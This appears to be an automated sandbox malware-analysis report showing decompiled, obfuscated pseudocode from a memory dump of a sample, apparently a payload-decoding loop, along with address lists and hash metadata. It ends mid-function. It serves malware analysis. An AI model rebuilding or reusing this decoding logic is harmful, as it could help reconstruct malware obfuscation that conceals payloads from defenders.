                                                                                                                                                                                                                                                    							__eflags = _t528;
                                                                                                                                                                                                                                                    							 *(_a4 + 0xac) = _t528;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t640 = _v36 + 1;
                                                                                                                                                                                                                                                    						__eflags = _t640;
                                                                                                                                                                                                                                                    						_v36 = _t640;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_t391 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t391 + 0xf0)) = ( *(_a4 + 0x38) ^  *0x01D1B1CD) + 0x273c;
                                                                                                                                                                                                                                                    					_t392 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					_t531 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					_t23 = _t392 + 0xec; // 0xe608d
                                                                                                                                                                                                                                                    					if( *_t23 !=  *((intOrPtr*)(_t531 + 0x14))) {
                                                                                                                                                                                                                                                    						_t394 =  *0x116d6dc; // 0xe608d
                                                                                                                                                                                                                                                    						_t395 = _t394 - 0x442f5;
                                                                                                                                                                                                                                                    						__eflags = _t395;
                                                                                                                                                                                                                                                    						_t532 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						 *(_t532 + 0x58) = _t395;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_t774 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						 *(_a4 + 0x74) =  *(_a4 + 0xb4) -  *((intOrPtr*)(_a4 + 0xfc)) -  *((intOrPtr*)(_t774 + 0xbadbfd)) |  *(_a4 + 0x74);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t396 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					_t42 = _t396 + 0xb4; // 0x0
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_a4 + 0xb0)) ==  *_t42) {
                                                                                                                                                                                                                                                    						_t764 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t43 = _t764 + 0x58; // 0xc4ec4ec5
                                                                                                                                                                                                                                                    						_t622 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						 *(_t622 + 0x58) =  *_t43 ^ 0x1a154549;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					 *0x116d678 = 0x10f30b0;
                                                                                                                                                                                                                                                    					_v24 = 0;
                                                                                                                                                                                                                                                    					while(_v24 < 0xb09c) {
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_a4 + 0x9c)) =  *((intOrPtr*)(_a4 + 0x9c)) -  *((intOrPtr*)(_a4 + 0xa4));
                                                                                                                                                                                                                                                    						_t596 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t61 = _t596 + 0xe4; // 0xc
                                                                                                                                                                                                                                                    						_t739 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t739 + 0xe4)) = ( *((intOrPtr*)(_a4 + 0xdc)) +  *(_a4 + 0xbadbdd) ^ 0x00000009) +  *_t61;
                                                                                                                                                                                                                                                    						_t740 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t63 = _t740 + 0x3c; // 0x161485
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_a4 + 0xa4)) =  *((intOrPtr*)(_a4 + 0xa4)) -  *_t63 - 0x161485;
                                                                                                                                                                                                                                                    						_t469 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t70 = _t469 + 0x88; // 0x10ec430
                                                                                                                                                                                                                                                    						_v16 =  *((intOrPtr*)( *_t70 + _v24 * 4));
                                                                                                                                                                                                                                                    						 *(_a4 + 0x14) =  *(_a4 + 0x14) |  *(_a4 + 0x8c);
                                                                                                                                                                                                                                                    						_t604 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t84 = _t604 + 0x58; // 0xc4ec4ec5
                                                                                                                                                                                                                                                    						_v16 = _v16 *  *_t84;
                                                                                                                                                                                                                                                    						_t606 =  *0x116d680; // 0xd02000
                                                                                                                                                                                                                                                    						 *((char*)(_t606 +  *((intOrPtr*)(_a4 + 0x5c)))) = _v16 >> 0x10;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_a4 + 0x5c)) =  *((intOrPtr*)(_a4 + 0x5c)) + 1;
                                                                                                                                                                                                                                                    						_t478 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t95 = _t478 + 0x90; // 0xd02000
                                                                                                                                                                                                                                                    						_t479 =  *0x116d64c; // 0x4b420
                                                                                                                                                                                                                                                    						 *((char*)( *_t95 + _t479)) = _v16 >> 8;
                                                                                                                                                                                                                                                    						_t609 =  *0x116d64c; // 0x4b420
                                                                                                                                                                                                                                                    						 *0x116d64c = _t609 + 1;
                                                                                                                                                                                                                                                    						_t611 =  *0x116d680; // 0xd02000
                                                                                                                                                                                                                                                    						 *((char*)(_t611 +  *((intOrPtr*)(_a4 + 0x5c)))) = _v16;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_a4 + 0x5c)) =  *((intOrPtr*)(_a4 + 0x5c)) + 1;
                                                                                                                                                                                                                                                    						_t482 =  *0x116d62c; // 0x161485
                                                                                                                                                                                                                                                    						_t614 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t105 = _t614 + 0xac; // 0x1a0e74
                                                                                                                                                                                                                                                    						_t757 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						 *(_t757 + 0xac) = _t482 - 0x00161485 ^  *_t105;
                                                                                                                                                                                                                                                    						_t772 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_a4 + 0xbadc81)) =  *((intOrPtr*)(_a4 + 0xbadc81)) -  *((intOrPtr*)(_a4 + 0xb8)) +  *((intOrPtr*)(_t772 + 0x40)) - 0x18e299;
                                                                                                                                                                                                                                                    						_v24 = _v24 + 1;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					 *(_a4 + 0x58) =  *0x0116D694 - 0x49249249;
                                                                                                                                                                                                                                                    					_v84 = _v20 + 0x48;
                                                                                                                                                                                                                                                    					_v80 = _v48 + 0xf8;
                                                                                                                                                                                                                                                    					_v76 = _v32 - 0x1aa;
                                                                                                                                                                                                                                                    					_t537 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					_v72 = _t537;
                                                                                                                                                                                                                                                    					_v68 = _v8 + 0x16e;
                                                                                                                                                                                                                                                    					_v64 = _v52 + 0x25a0;
                                                                                                                                                                                                                                                    					_v60 = _v32 ^ 0x00000091;
                                                                                                                                                                                                                                                    					_push(_v60);
                                                                                                                                                                                                                                                    					_v48 = L010D16C0(_v84, _v80, _v76, _v72, _v68, _v64);
                                                                                                                                                                                                                                                    					_t407 = _a4;
                                                                                                                                                                                                                                                    					_t769 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					__eflags =  *((intOrPtr*)(_t407 + 0xb8)) -  *((intOrPtr*)(_t769 + 0xbadbfd));
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t407 + 0xb8)) >=  *((intOrPtr*)(_t769 + 0xbadbfd))) {
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_a4 + 0x88)) = 0x10e9380;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_v28 = 0;
                                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                                    						__eflags = _v28 - 0xc0c;
                                                                                                                                                                                                                                                    						if(_v28 >= 0xc0c) {
                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						 *(_a4 + 0x14) =  *(_a4 + 0xe0) ^ 0xfffe3a5b |  *(_a4 + 0x14);
                                                                                                                                                                                                                                                    						_v12 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x88)) + _v28 * 4));
                                                                                                                                                                                                                                                    						_v12 = _v12 *  *(_a4 + 0x58);
                                                                                                                                                                                                                                                    						_t558 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t176 = _t558 + 0xdc; // 0x8
                                                                                                                                                                                                                                                    						_t693 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						 *(_t693 + 0xdc) =  *((intOrPtr*)(_a4 + 0x10)) -  *0x116d6d0 ^ 0x0001c5af |  *_t176;
                                                                                                                                                                                                                                                    						_t695 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t561 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						 *(_t561 + 0xa4) =  *((intOrPtr*)(_a4 + 0x78)) - 0x00079aca ^  *(_t695 + 0xa4);
                                                                                                                                                                                                                                                    						_t429 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t770 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_a4 + 0xec)) =  *((intOrPtr*)(_t429 + 0xbadbfd)) -  *((intOrPtr*)(_t770 + 0x14)) +  *((intOrPtr*)(_a4 + 0xec)) - 0x49bb9045;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_a4 + 0xbadc81)) =  *((intOrPtr*)(_a4 + 0xbadc81)) -  *((intOrPtr*)(_a4 + 0x3c)) - 0x161485;
                                                                                                                                                                                                                                                    						_t707 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t205 = _t707 + 0x90; // 0xd02000
                                                                                                                                                                                                                                                    						 *((char*)( *_t205 +  *((intOrPtr*)(_a4 + 0x5c)))) = _v12 >> 0x18;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_a4 + 0x5c)) =  *((intOrPtr*)(_a4 + 0x5c)) + 1;
                                                                                                                                                                                                                                                    						 *0x116d6a4 = ( *0x0116D604 ^ 0xb655b0d2) +  *0x116d6a4;
                                                                                                                                                                                                                                                    						_t574 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t441 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t441 + 0xbadbdd)) =  *(_a4 + 0xe0) +  *((intOrPtr*)(_t574 + 0xbadbdd)) + 0x1c5a5;
                                                                                                                                                                                                                                                    						_t716 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t221 = _t716 + 0x5c; // 0x4b420
                                                                                                                                                                                                                                                    						 *((char*)( *((intOrPtr*)(_a4 + 0x90)) +  *_t221)) = _v12 >> 0x10;
                                                                                                                                                                                                                                                    						_t443 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t225 = _t443 + 0x5c; // 0x4b420
                                                                                                                                                                                                                                                    						_t719 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t719 + 0x5c)) =  *_t225 + 1;
                                                                                                                                                                                                                                                    						_t581 =  *0x116d64c; // 0x4b420
                                                                                                                                                                                                                                                    						 *((char*)( *((intOrPtr*)(_a4 + 0x90)) + _t581)) = _v12 >> 8;
                                                                                                                                                                                                                                                    						_t721 =  *0x116d64c; // 0x4b420
                                                                                                                                                                                                                                                    						 *0x116d64c = _t721 + 1;
                                                                                                                                                                                                                                                    						_t584 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    						_t234 = _t584 + 0xe0; // 0xfffe3a5b
                                                                                                                                                                                                                                                    						 *(_a4 + 0xbadbdd) =  *(_a4 + 0xbadbdd) - ( *((intOrPtr*)(_a4 + 0xa4)) +  *_t234 ^ 0xfffe3a5b);
                                                                                                                                                                                                                                                    						 *((char*)( *((intOrPtr*)(_a4 + 0x90)) +  *((intOrPtr*)(_a4 + 0x5c)))) = _v12;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_a4 + 0x5c)) =  *((intOrPtr*)(_a4 + 0x5c)) + 1;
                                                                                                                                                                                                                                                    						 *0x0116D66C =  *((intOrPtr*)(0x116d66c)) +  *(_a4 + 0xb4);
                                                                                                                                                                                                                                                    						_t457 = _v28 + 1;
                                                                                                                                                                                                                                                    						__eflags = _t457;
                                                                                                                                                                                                                                                    						_v28 = _t457;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t544 =  *0x116d6d0; // 0xfffe3a5b
                                                                                                                                                                                                                                                    					 *(_a4 + 0x58) = _t544 + 0x4b79b;
                                                                                                                                                                                                                                                    					 *(_a4 + 0x58) =  *(_a4 + 0xac) +  *((intOrPtr*)(_a4 + 0x9c)) - 0x40d65a68 ^  *(_a4 + 0x58);
                                                                                                                                                                                                                                                    					_t683 =  *0x116d5ec; // 0x116d5f0
                                                                                                                                                                                                                                                    					_t269 = _t683 + 0xdc; // 0x8
                                                                                                                                                                                                                                                    					__eflags =  *_t269 -  *0x116d67c; // 0x0
                                                                                                                                                                                                                                                    					if(__eflags >= 0) {
                                                                                                                                                                                                                                                    						_t412 =  *0x116d648; // 0xc4ec4ec5
                                                                                                                                                                                                                                                    						_t413 = _t412 -  *((intOrPtr*)(_a4 + 0xec)) - 0xe44db;
                                                                                                                                                                                                                                                    						__eflags = _t413;
                                                                                                                                                                                                                                                    						 *0x116d648 = _t413;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				L25:
                                                                                                                                                                                                                                                    				_t355 = _v56 + 0x3b;
                                                                                                                                                                                                                                                    				__eflags = _t355;
                                                                                                                                                                                                                                                    				return _t355;
                                                                                                                                                                                                                                                    			}

























































































                                                                                                                                                                                                                                                    0x010e55cf
                                                                                                                                                                                                                                                    0x010e55db
                                                                                                                                                                                                                                                    0x010e55e7
                                                                                                                                                                                                                                                    0x010e55f2
                                                                                                                                                                                                                                                    0x010e55fe
                                                                                                                                                                                                                                                    0x010e560a
                                                                                                                                                                                                                                                    0x010e5610
                                                                                                                                                                                                                                                    0x010e561c
                                                                                                                                                                                                                                                    0x010e562b
                                                                                                                                                                                                                                                    0x010e5cbe
                                                                                                                                                                                                                                                    0x010e5ccc
                                                                                                                                                                                                                                                    0x010e5ccc
                                                                                                                                                                                                                                                    0x010e5ccf
                                                                                                                                                                                                                                                    0x010e5ce1
                                                                                                                                                                                                                                                    0x010e5ce4
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e5cfb
                                                                                                                                                                                                                                                    0x010e5d01
                                                                                                                                                                                                                                                    0x010e5d08
                                                                                                                                                                                                                                                    0x010e5d1d
                                                                                                                                                                                                                                                    0x010e5d33
                                                                                                                                                                                                                                                    0x010e5d39
                                                                                                                                                                                                                                                    0x010e5d3f
                                                                                                                                                                                                                                                    0x010e5d45
                                                                                                                                                                                                                                                    0x010e5d4b
                                                                                                                                                                                                                                                    0x010e5d51
                                                                                                                                                                                                                                                    0x010e5d62
                                                                                                                                                                                                                                                    0x010e5d76
                                                                                                                                                                                                                                                    0x010e5d89
                                                                                                                                                                                                                                                    0x010e5d8f
                                                                                                                                                                                                                                                    0x010e5dca
                                                                                                                                                                                                                                                    0x010e5dea
                                                                                                                                                                                                                                                    0x010e5ded
                                                                                                                                                                                                                                                    0x010e5df3
                                                                                                                                                                                                                                                    0x010e5df8
                                                                                                                                                                                                                                                    0x010e5e08
                                                                                                                                                                                                                                                    0x010e5e1d
                                                                                                                                                                                                                                                    0x010e5e35
                                                                                                                                                                                                                                                    0x010e5e44
                                                                                                                                                                                                                                                    0x010e5e5b
                                                                                                                                                                                                                                                    0x010e5e61
                                                                                                                                                                                                                                                    0x010e5e69
                                                                                                                                                                                                                                                    0x010e5e75
                                                                                                                                                                                                                                                    0x010e5e75
                                                                                                                                                                                                                                                    0x010e5e7e
                                                                                                                                                                                                                                                    0x010e5e7e
                                                                                                                                                                                                                                                    0x010e5cc6
                                                                                                                                                                                                                                                    0x010e5cc6
                                                                                                                                                                                                                                                    0x010e5cc9
                                                                                                                                                                                                                                                    0x010e5cc9
                                                                                                                                                                                                                                                    0x010e5631
                                                                                                                                                                                                                                                    0x010e564b
                                                                                                                                                                                                                                                    0x010e5650
                                                                                                                                                                                                                                                    0x010e565e
                                                                                                                                                                                                                                                    0x010e5663
                                                                                                                                                                                                                                                    0x010e5669
                                                                                                                                                                                                                                                    0x010e5673
                                                                                                                                                                                                                                                    0x010e56c2
                                                                                                                                                                                                                                                    0x010e56c7
                                                                                                                                                                                                                                                    0x010e56c7
                                                                                                                                                                                                                                                    0x010e56cc
                                                                                                                                                                                                                                                    0x010e56d2
                                                                                                                                                                                                                                                    0x010e5675
                                                                                                                                                                                                                                                    0x010e56a0
                                                                                                                                                                                                                                                    0x010e56bc
                                                                                                                                                                                                                                                    0x010e56bc
                                                                                                                                                                                                                                                    0x010e56d8
                                                                                                                                                                                                                                                    0x010e56e3
                                                                                                                                                                                                                                                    0x010e56e9
                                                                                                                                                                                                                                                    0x010e56eb
                                                                                                                                                                                                                                                    0x010e56f1
                                                                                                                                                                                                                                                    0x010e56f9
                                                                                                                                                                                                                                                    0x010e56ff
                                                                                                                                                                                                                                                    0x010e56ff
                                                                                                                                                                                                                                                    0x010e5702
                                                                                                                                                                                                                                                    0x010e570c
                                                                                                                                                                                                                                                    0x010e571e
                                                                                                                                                                                                                                                    0x010e5749
                                                                                                                                                                                                                                                    0x010e576a
                                                                                                                                                                                                                                                    0x010e5770
                                                                                                                                                                                                                                                    0x010e5776
                                                                                                                                                                                                                                                    0x010e577c
                                                                                                                                                                                                                                                    0x010e578a
                                                                                                                                                                                                                                                    0x010e5790
                                                                                                                                                                                                                                                    0x010e57af
                                                                                                                                                                                                                                                    0x010e57b6
                                                                                                                                                                                                                                                    0x010e57bb
                                                                                                                                                                                                                                                    0x010e57c7
                                                                                                                                                                                                                                                    0x010e57ed
                                                                                                                                                                                                                                                    0x010e57f1
                                                                                                                                                                                                                                                    0x010e57fa
                                                                                                                                                                                                                                                    0x010e57fe
                                                                                                                                                                                                                                                    0x010e580d
                                                                                                                                                                                                                                                    0x010e5813
                                                                                                                                                                                                                                                    0x010e5822
                                                                                                                                                                                                                                                    0x010e582b
                                                                                                                                                                                                                                                    0x010e5830
                                                                                                                                                                                                                                                    0x010e5836
                                                                                                                                                                                                                                                    0x010e583b
                                                                                                                                                                                                                                                    0x010e583e
                                                                                                                                                                                                                                                    0x010e5847
                                                                                                                                                                                                                                                    0x010e5853
                                                                                                                                                                                                                                                    0x010e585c
                                                                                                                                                                                                                                                    0x010e586b
                                                                                                                                                                                                                                                    0x010e586e
                                                                                                                                                                                                                                                    0x010e5878
                                                                                                                                                                                                                                                    0x010e587e
                                                                                                                                                                                                                                                    0x010e5884
                                                                                                                                                                                                                                                    0x010e588a
                                                                                                                                                                                                                                                    0x010e58b2
                                                                                                                                                                                                                                                    0x010e58da
                                                                                                                                                                                                                                                    0x010e571b
                                                                                                                                                                                                                                                    0x010e571b
                                                                                                                                                                                                                                                    0x010e58fd
                                                                                                                                                                                                                                                    0x010e5906
                                                                                                                                                                                                                                                    0x010e5912
                                                                                                                                                                                                                                                    0x010e591d
                                                                                                                                                                                                                                                    0x010e5920
                                                                                                                                                                                                                                                    0x010e5926
                                                                                                                                                                                                                                                    0x010e5932
                                                                                                                                                                                                                                                    0x010e593d
                                                                                                                                                                                                                                                    0x010e5949
                                                                                                                                                                                                                                                    0x010e594f
                                                                                                                                                                                                                                                    0x010e5970
                                                                                                                                                                                                                                                    0x010e5983
                                                                                                                                                                                                                                                    0x010e5986
                                                                                                                                                                                                                                                    0x010e5993
                                                                                                                                                                                                                                                    0x010e5997
                                                                                                                                                                                                                                                    0x010e599c
                                                                                                                                                                                                                                                    0x010e599c
                                                                                                                                                                                                                                                    0x010e59a6
                                                                                                                                                                                                                                                    0x010e59b8
                                                                                                                                                                                                                                                    0x010e59b8
                                                                                                                                                                                                                                                    0x010e59bf
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e59ee
                                                                                                                                                                                                                                                    0x010e5a01
                                                                                                                                                                                                                                                    0x010e5a0e
                                                                                                                                                                                                                                                    0x010e5a2b
                                                                                                                                                                                                                                                    0x010e5a31
                                                                                                                                                                                                                                                    0x010e5a37
                                                                                                                                                                                                                                                    0x010e5a3d
                                                                                                                                                                                                                                                    0x010e5a56
                                                                                                                                                                                                                                                    0x010e5a6b
                                                                                                                                                                                                                                                    0x010e5a71
                                                                                                                                                                                                                                                    0x010e5a88
                                                                                                                                                                                                                                                    0x010e5a8d
                                                                                                                                                                                                                                                    0x010e5aae
                                                                                                                                                                                                                                                    0x010e5ade
                                                                                                                                                                                                                                                    0x010e5af1
                                                                                                                                                                                                                                                    0x010e5af7
                                                                                                                                                                                                                                                    0x010e5afd
                                                                                                                                                                                                                                                    0x010e5b0c
                                                                                                                                                                                                                                                    0x010e5b29
                                                                                                                                                                                                                                                    0x010e5b40
                                                                                                                                                                                                                                                    0x010e5b59
                                                                                                                                                                                                                                                    0x010e5b5e
                                                                                                                                                                                                                                                    0x010e5b68
                                                                                                                                                                                                                                                    0x010e5b6e
                                                                                                                                                                                                                                                    0x010e5b7a
                                                                                                                                                                                                                                                    0x010e5b7d
                                                                                                                                                                                                                                                    0x010e5b82
                                                                                                                                                                                                                                                    0x010e5b88
                                                                                                                                                                                                                                                    0x010e5b8e
                                                                                                                                                                                                                                                    0x010e5ba0
                                                                                                                                                                                                                                                    0x010e5ba6
                                                                                                                                                                                                                                                    0x010e5ba9
                                                                                                                                                                                                                                                    0x010e5bb2
                                                                                                                                                                                                                                                    0x010e5bd2
                                                                                                                                                                                                                                                    0x010e5bd8
                                                                                                                                                                                                                                                    0x010e5bf8
                                                                                                                                                                                                                                                    0x010e5c0e
                                                                                                                                                                                                                                                    0x010e5c1d
                                                                                                                                                                                                                                                    0x010e5c3f
                                                                                                                                                                                                                                                    0x010e59b2
                                                                                                                                                                                                                                                    0x010e59b2
                                                                                                                                                                                                                                                    0x010e59b5
                                                                                                                                                                                                                                                    0x010e59b5
                                                                                                                                                                                                                                                    0x010e5c4a
                                                                                                                                                                                                                                                    0x010e5c59
                                                                                                                                                                                                                                                    0x010e5c7e
                                                                                                                                                                                                                                                    0x010e5c87
                                                                                                                                                                                                                                                    0x010e5c8d
                                                                                                                                                                                                                                                    0x010e5c93
                                                                                                                                                                                                                                                    0x010e5c99
                                                                                                                                                                                                                                                    0x010e5caa
                                                                                                                                                                                                                                                    0x010e5caf
                                                                                                                                                                                                                                                    0x010e5caf
                                                                                                                                                                                                                                                    0x010e5cb1
                                                                                                                                                                                                                                                    0x010e5cb1
                                                                                                                                                                                                                                                    0x010e5cb6
                                                                                                                                                                                                                                                    0x010e5e89
                                                                                                                                                                                                                                                    0x010e5e8c
                                                                                                                                                                                                                                                    0x010e5e8c
                                                                                                                                                                                                                                                    0x010e5e93

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 2acdb764e67525262569cba869024c3126b8fd571fc60d1e7d1efb915ef6a710
                                                                                                                                                                                                                                                    • Instruction ID: 66fb1aa1bab700a5a4be38e47d601a576a8c8663c09cabfa55d373a6f82b0696
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2acdb764e67525262569cba869024c3126b8fd571fc60d1e7d1efb915ef6a710
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3852D6746002059FDB18CF58D194BA9BBB2FB88304F14C279E9599F79AC735E982CF84
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E010E7440(intOrPtr _a4, intOrPtr _a8, signed int _a16, signed int _a24, intOrPtr _a28) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                    				unsigned int _v16;
                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                    				unsigned int _v24;
                                                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                                                    				signed int _v72;
                                                                                                                                                                                                                                                    				intOrPtr _v76;
                                                                                                                                                                                                                                                    				signed int _v80;
                                                                                                                                                                                                                                                    				intOrPtr _t419;
                                                                                                                                                                                                                                                    				intOrPtr _t420;
                                                                                                                                                                                                                                                    				intOrPtr _t423;
                                                                                                                                                                                                                                                    				intOrPtr _t449;
                                                                                                                                                                                                                                                    				intOrPtr _t462;
                                                                                                                                                                                                                                                    				intOrPtr _t477;
                                                                                                                                                                                                                                                    				intOrPtr _t492;
                                                                                                                                                                                                                                                    				intOrPtr _t519;
                                                                                                                                                                                                                                                    				intOrPtr _t534;
                                                                                                                                                                                                                                                    				intOrPtr _t535;
                                                                                                                                                                                                                                                    				intOrPtr _t537;
                                                                                                                                                                                                                                                    				intOrPtr _t540;
                                                                                                                                                                                                                                                    				intOrPtr _t544;
                                                                                                                                                                                                                                                    				signed int _t553;
                                                                                                                                                                                                                                                    				intOrPtr _t569;
                                                                                                                                                                                                                                                    				intOrPtr _t571;
                                                                                                                                                                                                                                                    				intOrPtr _t588;
                                                                                                                                                                                                                                                    				intOrPtr _t596;
                                                                                                                                                                                                                                                    				intOrPtr _t618;
                                                                                                                                                                                                                                                    				intOrPtr _t625;
                                                                                                                                                                                                                                                    				intOrPtr _t634;
                                                                                                                                                                                                                                                    				intOrPtr _t637;
                                                                                                                                                                                                                                                    				intOrPtr _t643;
                                                                                                                                                                                                                                                    				intOrPtr _t663;
                                                                                                                                                                                                                                                    				intOrPtr _t679;
                                                                                                                                                                                                                                                    				intOrPtr _t683;
                                                                                                                                                                                                                                                    				intOrPtr _t689;
                                                                                                                                                                                                                                                    				intOrPtr _t691;
                                                                                                                                                                                                                                                    				intOrPtr _t692;
                                                                                                                                                                                                                                                    				intOrPtr _t693;
                                                                                                                                                                                                                                                    				intOrPtr _t694;
                                                                                                                                                                                                                                                    				intOrPtr _t696;
                                                                                                                                                                                                                                                    				intOrPtr _t740;
                                                                                                                                                                                                                                                    				intOrPtr _t750;
                                                                                                                                                                                                                                                    				intOrPtr _t757;
                                                                                                                                                                                                                                                    				intOrPtr _t759;
                                                                                                                                                                                                                                                    				intOrPtr _t770;
                                                                                                                                                                                                                                                    				intOrPtr _t780;
                                                                                                                                                                                                                                                    				intOrPtr _t806;
                                                                                                                                                                                                                                                    				intOrPtr _t824;
                                                                                                                                                                                                                                                    				intOrPtr _t828;
                                                                                                                                                                                                                                                    				intOrPtr _t829;
                                                                                                                                                                                                                                                    				intOrPtr _t831;
                                                                                                                                                                                                                                                    				signed int _t836;
                                                                                                                                                                                                                                                    				intOrPtr _t856;
                                                                                                                                                                                                                                                    				intOrPtr _t857;
                                                                                                                                                                                                                                                    				intOrPtr _t860;
                                                                                                                                                                                                                                                    				intOrPtr _t864;
                                                                                                                                                                                                                                                    				intOrPtr _t865;
                                                                                                                                                                                                                                                    				intOrPtr _t873;
                                                                                                                                                                                                                                                    				intOrPtr _t877;
                                                                                                                                                                                                                                                    				intOrPtr _t879;
                                                                                                                                                                                                                                                    				intOrPtr _t880;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v12 = _a16 ^ 0x000027b9;
                                                                                                                                                                                                                                                    				_v48 = _a8 - 0x5d;
                                                                                                                                                                                                                                                    				_v80 = _a24 ^ 0x00000236;
                                                                                                                                                                                                                                                    				_v20 = _a8 - 0xd1;
                                                                                                                                                                                                                                                    				_v52 = _a4 + 0x41;
                                                                                                                                                                                                                                                    				_v40 = _a8 + 0x221;
                                                                                                                                                                                                                                                    				_v8 = _a24;
                                                                                                                                                                                                                                                    				if(_v12 == _v48 + 0x65) {
